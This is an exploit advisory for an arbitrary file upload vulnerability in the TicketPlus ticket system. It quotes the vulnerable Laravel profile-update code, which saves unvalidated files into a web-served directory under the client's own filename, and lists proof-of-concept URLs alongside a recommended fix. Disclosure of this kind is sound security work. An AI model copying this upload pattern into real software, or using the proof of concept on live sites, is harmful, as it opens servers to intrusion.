# # # # #
# Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload
# Dork: N/A
# Date: 26.09.2017
# Vendor Homepage: http://teamworktec.com/
# Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316
# Demo: http://sportsgrand.com/demo/ticket_plus/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows a user to upload an arbitrary file through the profile update form.
# The handler below validates only name, username and email; the uploaded file has no
# validation rule and is moved into the web-served 'uploads' directory under the
# client-supplied original file name.
# Fix: validate the upload against an allow-list (e.g. Laravel's image/mimes rules plus a size
# limit), store it under a server-generated name, and keep the upload directory outside the
# web root or configured so that its contents are never executed as scripts.
#
# Vulnerable Source:
#
# public function updateProfile(Request $request) {
#     $this->validate($request, [
#         'name' => 'required|max:32',
#         'username' => 'required|max:32|unique:users,username,'.Auth::id(),
#         'email' => 'email|max:40|unique:users,email,'.Auth::id()
#     ]);
#
#     $user = User::find(Auth::id());
#     $user->name = $request->name;
#     $user->username = $request->username;
#     $user->email = $request->email;
#     if(!empty($request->file)){
#         $request->file->move('uploads', $request->file->getClientOriginalName());
#         $user->avatar = $request->file->getClientOriginalName();
#     }
#     $user->save();
#     return redirect()->back()->withMessage('Profile updated successfully');
# }
#
# Proof of Concept:
#
# http://localhost/[PATH]/profile/settings
# http://localhost/[PATH]/uploads/[FILE]
#
# Etc..
# # # # #